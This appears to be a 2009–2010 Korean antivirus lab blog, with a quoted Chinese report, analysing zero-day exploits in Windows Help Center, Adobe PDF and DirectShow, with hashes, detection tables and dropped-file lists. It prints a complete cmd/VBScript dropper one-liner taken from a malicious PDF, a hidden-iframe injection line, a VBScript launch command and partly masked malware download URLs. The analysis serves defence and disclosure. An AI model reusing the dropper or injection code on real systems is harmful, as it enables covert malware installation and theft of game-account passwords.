태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

신종악성코드정보2010.06.16 10:23


윈도우 도움말 및 지원 센터 취약점을 통한 악성코드가 발견되었습니다.

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885

http://www.microsoft.com/technet/security/advisory/2219475.mspx

사용자 삽입 이미지

Kaspersky 제품에서는 Exploit.HTML.HCP.a 라는 진단명으로 추가한 상태입니다.

발견된 MD5 Hash 파일들입니다.

- 2a8dd61b35b9426412b9d373daabae79
- 62f4daf19da62595609d6a0c0089fcac
- b107fdc90691db5c54d13c5e50557c7e


nProtect Anti-Virus 제품에 치료 기능을 추가할 예정입니다.

Posted by viruslab
보안관련소식2010.06.11 11:06


Microsoft Security Advisory (2219475)
Vulnerability in Windows Help and Support Center
Could Allow Remote Code Execution
microsoft.com

윈도우 도움말 및 지원센터 취약점이 보고되었습니다.

아직 보안패치가 공식적으로 발표되지 않았으며, 공격 코드(PoC)가 공개되었으므로, Zero-Day Attack 으로 발전될 가능성이 높습니다.

마이크로 소프트도 취약점 때문에 머리좀 아프겠네요!

사용자 삽입 이미지

 
Posted by viruslab
보안관련소식2010.06.09 12:17


PDF 취약점 파일 감염 과정입니다.

보통 이메일 첨부파일 형태로 불특정 다수에게 배포되기도 합니다.

참고 자료 보기
pdf 악성코드 메일로 유포된 사례
viruslab.tistory.com

먼저 해당 파일을 실행하면 다음과 같은 화면과 문서 파일이 뒷부분으로 보여집니다.

사용자 삽입 이미지

C:\WINDOWS\system32\cmd.exe /c echo Dim BinaryStream > temp_system321.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream") >> temp_system321.vbs && echo BinaryStream.Type = 1 >> temp_system321.vbs && echo BinaryStream.Open >> temp_system321.vbs && echo BinaryStream.LoadFromFile FindLastModified(".") >> temp_system321.vbs && echo BinaryStream.Position=77072      >> temp_system321.vbs && echo s = BinaryStream.Read (204444    -77072     ) >> temp_system321.vbs && echo BinaryStream.Close >> temp_system321.vbs && echo BinaryStream.Open >> temp_system321.vbs && echo BinaryStream.Write s >> temp_system321.vbs && echo BinaryStream.SaveToFile "temp_system322.vbs",2 >> temp_system321.vbs && echo BinaryStream.Close >> temp_system321.vbs && echo dim wshshell >> temp_system321.vbs && echo set wshshell = wscript.createobject("wscript.shell") >> temp_system321.vbs && echo wshshell.run "temp_system322.vbs",0,FALSE >> temp_system321.vbs && echo Function FindLastModified(strDir)   >> temp_system321.vbs && echo Set objFSO = CreateObject("Scripting.FileSystemObject")   >> temp_system321.vbs && echo Set oFolder = objFSO.GetFolder(strDir)   >> temp_system321.vbs && echo d = CDate("1/1/1950")   >> temp_system321.vbs && echo For Each oFile In oFolder.Files   >> temp_system321.vbs && echo If oFile.DateLastModified ^> d and InStr(oFile.Name, ".pdf") ^> 0 Then   >> temp_system321.vbs && echo NewestFile = oFile.Name   >> temp_system321.vbs && echo d = oFile.DateLastModified   >> temp_system321.vbs && echo End If   >> temp_system321.vbs && echo Next   >> temp_system321.vbs && echo FindLastModified = NewestFile   >> temp_system321.vbs && echo End Function    >> temp_system321.vbs  && temp_system321.vbs


  && echo


PLEASE PRESS OK BUTTON!



사용자 삽입 이미지

system321.vbs, system322.vbs 등의 스크립트 파일을 생성하여 exe 파일을 설치합니다.
 
사용자 삽입 이미지
사용자 삽입 이미지

현재 system32.exe 파일이 생성되지만 손상된 형태로 만들어지고 있는 것으로 파악되었습니다.

바이러스 토탈 진단 현황

http://www.virustotal.com/analisis/1e70058128ebfff634a453483dd48cc4e929bda17e960d1d5c0e2b7722ca017a-1276041725

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.09 Exploit.PDF-Dropper!IK
AhnLab-V3 2010.06.09.00 2010.06.09 -
AntiVir 8.2.2.6 2010.06.08 -
Antiy-AVL 2.0.3.7 2010.06.08 -
Authentium 5.2.0.5 2010.06.08 PDF/Expl.HY
Avast 4.8.1351.0 2010.06.08 PDF:Risk-A
Avast5 5.0.332.0 2010.06.08 PDF:Risk-A
AVG 9.0.0.787 2010.06.08 -
BitDefender 7.2 2010.06.09 Exploit.PDF-Dropper.Gen
CAT-QuickHeal 10.00 2010.06.08 -
ClamAV 0.96.0.3-git 2010.06.09 -
Comodo 5033 2010.06.09 -
DrWeb 5.0.2.03300 2010.06.09 -
eSafe 7.0.17.0 2010.06.08 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7618 2010.06.08 PDF/POS!exploit
F-Prot 4.6.0.103 2010.06.08 -
F-Secure 9.0.15370.0 2010.06.08 Exploit.PDF-Dropper.Gen
Fortinet 4.1.133.0 2010.06.08 -
GData 21 2010.06.09 Exploit.PDF-Dropper.Gen
Ikarus T3.1.1.84.0 2010.06.08 Exploit.PDF-Dropper
Jiangmin 13.0.900 2010.06.08 -
Kaspersky 7.0.0.125 2010.06.08 Trojan-Dropper.VBS.Pdfka.a
McAfee 5.400.0.1158 2010.06.09 Exploit-PDF.ck
McAfee-GW-Edition 2010.1 2010.06.08 -
Microsoft 1.5802 2010.06.08 -
NOD32 5183 2010.06.08 -
Norman 6.04.12 2010.06.08 -
nProtect 2010-06-08.01 2010.06.08 Exploit.PDF-Dropper.Gen
Panda 10.0.2.7 2010.06.08 -
PCTools 7.0.3.5 2010.06.09 HeurEngine.PDF
Prevx 3.0 2010.06.09 -
Rising 22.51.01.04 2010.06.08 -
Sophos 4.53.0 2010.06.09 -
Sunbelt 6421 2010.06.09 -
Symantec 20101.1.0.89 2010.06.08 Bloodhound.PDF.24
TheHacker 6.5.2.0.295 2010.06.08 -
TrendMicro 9.120.0.1004 2010.06.08 -
TrendMicro-HouseCall 9.120.0.1004 2010.06.09 -
VBA32 3.12.12.5 2010.06.08 -
ViRobot 2010.6.8.2343 2010.06.08 -
VirusBuster 5.0.27.0 2010.06.08 VBS.Exedrop.F



Posted by viruslab
신종악성코드정보2010.06.07 13:21


Adobe CVE-2010-1297 PDF 취약점 시연 화면 입니다.

PDF Zero-Day 공격 취약점 주의
아직 보안패치가 발표되지 않았으니 각별히 주의하세요.
www.adobe.com

트랜드 마이크로 분석 정보
http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ%5FPIDIEF%2EWX&VSect=T

바이러스 토탈 진단 현황
http://www.virustotal.com/analisis/bd2776e507cf0284a9cfb7deb9a241d6699243a221c125f9911fa753ca8f01d1-1275886442

Antivirus Version Last Update Result
a-squared 5.0.0.26 2010.06.07 HTML.Malicious!IK
AhnLab-V3 2010.06.06.00 2010.06.06 -
AntiVir 8.2.2.6 2010.06.06 HTML/Malicious.PDF.Gen
Antiy-AVL 2.0.3.7 2010.06.04 -
Authentium 5.2.0.5 2010.06.06 -
Avast 4.8.1351.0 2010.06.06 JS:Pdfka-gen
Avast5 5.0.332.0 2010.06.06 JS:Pdfka-gen
AVG 9.0.0.787 2010.06.06 Exploit_c.GGK
BitDefender 7.2 2010.06.07 Exploit.SWF.J
CAT-QuickHeal 10.00 2010.06.07 -
ClamAV 0.96.0.3-git 2010.06.07 -
Comodo 5013 2010.06.07 -
DrWeb 5.0.2.03300 2010.06.07 -
eSafe 7.0.17.0 2010.06.06 -
eTrust-Vet 35.2.7528 2010.06.04 -
F-Prot 4.6.0.103 2010.06.06 -
F-Secure 9.0.15370.0 2010.06.07 Exploit:W32/Pidief.CPT
Fortinet 4.1.133.0 2010.06.06 -
GData 21 2010.06.07 Exploit.SWF.J
Ikarus T3.1.1.84.0 2010.06.07 HTML.Malicious
Jiangmin 13.0.900 2010.06.06 -
Kaspersky 7.0.0.125 2010.06.07 Exploit.JS.Pdfka.ckq
McAfee 5.400.0.1158 2010.06.07 -
McAfee-GW-Edition 2010.1 2010.06.06 -
Microsoft 1.5802 2010.06.06 Exploit:Win32/Pdfjsc.gen!A
NOD32 5177 2010.06.06 -
Norman 6.04.12 2010.06.06 -
nProtect 2010-06-06.01 2010.06.06 -
Panda 10.0.2.7 2010.06.06 -
PCTools 7.0.3.5 2010.06.07 -
Prevx 3.0 2010.06.07 -
Rising 22.51.00.01 2010.06.07 -
Sophos 4.53.0 2010.06.07 -
Sunbelt 6414 2010.06.07 -
Symantec 20101.1.0.89 2010.06.07 -
TheHacker 6.5.2.0.292 2010.06.04 -
TrendMicro 9.120.0.1004 2010.06.06 -
TrendMicro-HouseCall 9.120.0.1004 2010.06.07 TROJ_PIDIEF.WX
VBA32 3.12.12.5 2010.06.04 -
ViRobot 2010.6.5.2339 2010.06.07 JS.S.EX-Pdfka.268333
VirusBuster 5.0.27.0 2010.06.06 -


nProtect Anti-Virus 6월 7일자에 치료 기능 추가



 




Posted by viruslab
신종악성코드정보2009.07.12 11:23


http://viruslab.tistory.com/887

사용자 삽입 이미지

기존에 H.exe 를 유포했던 공격자(조직)가 이번에 Zero-Day 취약점을 통해서 악성코드 유포를 진행 중입니다.

http://www.(생략).co.kr/
http://www.(생략).co.kr/Lib/Script/common.js
}document.write('<iframe height=0 width=0 src="http://211.(생략).65/index.htm"></iframe>');

Zero-Day Exploit Code -> 임시조치 -> http://support.microsoft.com/kb/972890

http://211.(생략).65/logo.jpg
http://211.(생략).65/go1.jpg
http://211.(생략).65/go.jpg
http://211.(생략).65/go2.jpg

설치되는 EXE 악성코드

http://www.(생략).or.kr/HH.exe
http://www.(생략).kr/admin/order/mlist/3.txt
http://www.(생략).kr/admin/order/mlist/ip.rar

감염이 이루어지면 시스템 폴더에 다음과 같은 파일이 생성(일부 숨김속성)됩니다.

zhido.exe
e8main0.dll
cao110.dll
cao220.dll

윈도우 폴더에 생성되는 AhnRpta.exe 는 정상적인 메모장(notepad.exe)파일의 복사본이며, 이것을 이용해서 특정 사이트에 접속하여 변종을 다운로드 하는 매개체로 사용합니다.

cao220.dll 파일은 {C8414FA0-BA90-4600-B7EA-0CEFAF5A0636} CLSID 값을 이용합니다.

ip.rar 파일은 RAR 파일처럼 위장하고 있으며, 암호화된 형식으로 실제로는 zhido.exe 로 설치됩니다.

Posted by viruslab
신종악성코드정보2009.07.07 08:49


http://www.nprotect.com/v6/contents/index.php?mode=inca_sc_view&no=68

사용자 삽입 이미지

중국내에서 악성코드 유포에 사용되고 있으며, 현재 이 시간 유포가 진행되고 있는 사이트가 존재한다.

Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit漏洞
受影响的软件:
Microsoft DirectShow(msvidctl.dll)
描述和解决方案:
安装安天防线2009和锐甲可以阻挡Microsoft DirectShow微软视频0DAY漏洞网马

1、网页木马直接下载的病毒文件:
http://xin765***.com/wm/svchost.exe 病毒名:Trojan/Win32.Killav.gg[Dropper]
描述:下载者木马,关闭安全软件进程、连接网络下载大量病毒文件
衍生文件:
c:\WINDOWS\system32\drivers\etc\hosts
c:\WINDOWS\system32\drivers\OLD3.tmp
c:\WINDOWS\system32\drivers\pcidump.sys
c:\WINDOWS\system32\drivers\acpiec.sys
c:\WINDOWS\system32\dllcache\acpiec.sys
c:\WINDOWS\system32\func.dll
c:\WINDOWS\phpq.dll
c:\WINDOWS\LastGood\system32\drivers\acpiec.sys
c:\1.exe
c:\autorun.inf
2、病毒读取网络下载列表地址:
http://babi2009***.com/360/aa1dfh.txt
3、由下载者木马下载的其他病毒文件:
http://haha888l***.com/xiao/aa1.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:梦幻西游盗号木
衍生文件:
c:\WINDOWS\system32\kSVHjMeWr5ZZY47.dll
c:\WINDOWS\Fonts\F5hFtXrw8.Ttf

http://haha888l***.com/xiao/aa2.exe 病毒名:Trojan/Win32.Magania.bjsy[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\EN7hzSreCat8.dll
c:\WINDOWS\system32\dfc8ac3ed7da.dll
c:\WINDOWS\system32\comres.dll
c:\WINDOWS\Fonts\R6WhWBmZsEdPZDjQP.Ttf

http://haha888l***.com/xiao/aa3.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:封神榜?网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\JPccCJnKygDdp3.dll
c:\WINDOWS\Fonts\uawyv9Pr.Ttf

http://haha888l***.com/xiao/aa4.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
描述:大话西游 ii游戏盗号木马
衍生文件:
c:\WINDOWS\system32\GsfMwDWD3.dll
c:\WINDOWS\Fonts\QT7f3JmmJrcx.Ttf

http://haha888l***.com/xiao/aa5.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\m75TJUvNjzQF.Ttf
c:\WINDOWS\Fonts\wQ7KbaNZKMe5G4qZ.fon

http://haha888l***.com/xiao/aa6.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\xg4hAPNygs29.dll
c:\WINDOWS\Fonts\K7XaTBMWp8TPrYgw.Ttf

http://haha888l***.com/xiao/aa7.exe 病毒名:Trojan/Win32.Magania.bkii[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\dktXFYbT3G.dll
c:\WINDOWS\Fonts\xFQymHn5e4keKWye.Ttf

http://haha888l***.com/xiao/aa8.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\P2xnxaS5acXpS95.dll
c:\WINDOWS\Fonts\m75TJUvNjzQF.Ttf

http://haha888l***.com/xiao/aa9.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:剑侠世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\skcfujQ5EDN.dll
c:\WINDOWS\Fonts\YywxhF7TSnkktrJw.Ttf

http://haha888l***.com/xiao/aa10.exe 病毒名:Trojan/Win32.Magania.bfws[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\T4HyJ7uGEauA.Ttf
c:\WINDOWS\Fonts\MqppW9KYn.fon

http://haha888l***.com/xiao/aa11.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\taNjsFa2tT2Dh.dll
c:\WINDOWS\Fonts\RCZbVbjCY6wYszD3.Ttf

http://haha888l***.com/xiao/aa12.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:生存之旅游戏盗号木马
衍生文件:
c:\WINDOWS\system32\704C3595.dll
c:\WINDOWS\Fonts\S8a8cnEuaydPJGg8.Ttf

http://haha888l***.com/xiao/aa13.exe 病毒名:Trojan/Win32.Magania.bfdq[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\E4814792.dll
c:\WINDOWS\Fonts\EEUJgNKN6xmNqKr6.Ttf

http://haha888l***.com/xiao/aa14.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
描述:传奇游戏盗号木
衍生文件:
c:\WINDOWS\Fonts\MhaUKGazkr3fZZKp.Ttf
c:\WINDOWS\Fonts\fyrwJf5Qfhh.fon

http://haha888l***.com/xiao/aa15.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:诛仙游戏盗号木
衍生文件:
c:\WINDOWS\system32\A0C86020.dll
c:\WINDOWS\Fonts\6e6EUdxVeWUYJynN.Ttf

http://haha888l***.com/xiao/aa16.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\BqfKfz6gSK.Ttf
c:\WINDOWS\Fonts\zAPWgSjGrSpdsE4.fon

http://haha888l***.com/xiao/aa17.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\qB5BKZy7vR5m.dll
c:\WINDOWS\Fonts\PeMTdMfqzpGTb5ps.Ttf

http://haha888l***.com/xiao/aa18.exe 病毒名:Trojan/Win32.Magania.bfsy[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\JNwybEjgUVaxBU5d.Ttf
c:\WINDOWS\Fonts\CESPVP8FQd.fon

http://haha888l***.com/xiao/aa19.exe 病毒名:Trojan/Win32.Magania.bfsy[GameThief]
描述:QQ厦华游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\pDuuqr4BgFn65AeW.Ttf
c:\WINDOWS\Fonts\vwuXtYbhj.fon

http://haha888l***.com/xiao/aa20.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:大话西游3游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ndxq9awMc.dll
c:\WINDOWS\Fonts\CRp3uYCmcxMp3qQn9.Ttf

http://haha888l***.com/xiao/aa21.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:魔域游戏盗号木
衍生文件:
c:\WINDOWS\system32\08223B03.dll
c:\WINDOWS\Fonts\eCgMhGRkPUcdutd0.Ttf

http://haha888l***.com/xiao/aa22.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:诛仙游戏盗号木
衍生文件:
c:\WINDOWS\system32\122B901E.dll
c:\WINDOWS\Fonts\cFDPmh3MDPjcHMPd.Ttf

http://haha888l***.com/xiao/aa23.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:诛仙游戏盗号木
衍生文件:
c:\WINDOWS\system32\dhDhwS7fFW.dll
c:\WINDOWS\Fonts\cD9KArZZUHxCqnyM.Ttf

http://haha888l***.com/xiao/aa24.exe 病毒名:Trojan/Win32.Magania.bkcz[GameThief]
描述:永恒之塔游戏盗号木马
衍生文件:
c:\WINDOWS\system32\Va7SpUWgCA5f.dll
c:\WINDOWS\Fonts\FCvvnT2B.Ttf

http://haha888l***.com/xiao/aa25.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\EHMs25j4ArEwPKHS.Ttf
c:\WINDOWS\Fonts\vgUGf6VF2E.fon

http://haha888l***.com/xiao/aa26.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ybM7kf9heVHDx.dll
c:\WINDOWS\Fonts\EcZFMzAp3.Ttf

http://haha888l***.com/xiao/aa27.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
描述:传奇外传游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\du3Q2JXbHYGxcSAe.Ttf
c:\WINDOWS\Fonts\tY5UFS434YYd.fon

http://haha888l***.com/xiao/aa28.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\GU6f5sW42mdc.dll
c:\WINDOWS\Fonts\avJ9SdDwMd9Qzt.Ttf

http://haha888l***.com/xiao/aa29.exe Trojan/Win32.Magania.bfrp[GameThief]
描述:华夏2游戏盗号木马
衍生文件:
c:\WINDOWS\system32\2EF0D734.dll
c:\WINDOWS\Fonts\Qq3qg7RGSp9raxWW.Ttf

http://haha888l***.com/xiao/aa30.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\RhdwE8NYdbqQ.dll
c:\WINDOWS\Fonts\BqfKfz6gSK.Ttf

http://haha888l***.com/xiao/aa31.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\wadSSw5k.dll
c:\WINDOWS\Fonts\Vx53f7Scj63HVHDE.Ttf

http://haha888l***.com/xiao/aa32.exe 病毒名:Trojan/Win32.Magania.bkcv[GameThief]
描述:梦幻西游online游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\F5hFtXrw8.Ttf
c:\WINDOWS\Fonts\xbpCfXnG6wUVF.fon

http://haha888l***.com/xiao/aa33.exe 病毒名:Trojan/Win32.OnLineGames.bmiz[GameThief]
描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\usbvmx.dll
c:\WINDOWS\system32\ed78ab9.dll
c:\WINDOWS\Fonts\yGMHUAj5Npydj8FZ.ttf

http://haha888l***.com/xiao/aa34.exe 病毒名:Trojan/Win32.QQFish.l[PSW]
描述:钓鱼木马伪装QQ官方发布中奖信息
衍生文件:
c:\WINDOWS\system32\www.qq13x.cn

http://haha888l***.com/xiao/aa35.exe 病毒名:Trojan/Win32.OnLineGames.bmzy[GameThief]
描述:QQ盗号木马
衍生文件:
c:\Documents and Settings\a\Application Data\Set8.dll
c:\Documents and Settings\a\Application Data\Set8.tmp
c:\Documents and Settings\a\Application Data\R8.bak

http://haha888l***.com/xiao/aa36.exe 病毒名:Trojan/Win32.Agent.fn[DDoS]
描述:后门木马,发布DDOS攻击
衍生文件:
c:\WINDOWS\system32\aa36.exe

http://haha888l***.com/xiao/1.exe 病毒名:Trojan/VBS.IEstart.e
描述:利用脚本执行命令:
vbscript:CreateObject("WScript.Shell").Run("iexplore http://tj.mehoab***.com/bb/tj1jdoiash.htm",0)(window.close)连接该域名地址发送安装统计信息
衍生文件:无


Posted by viruslab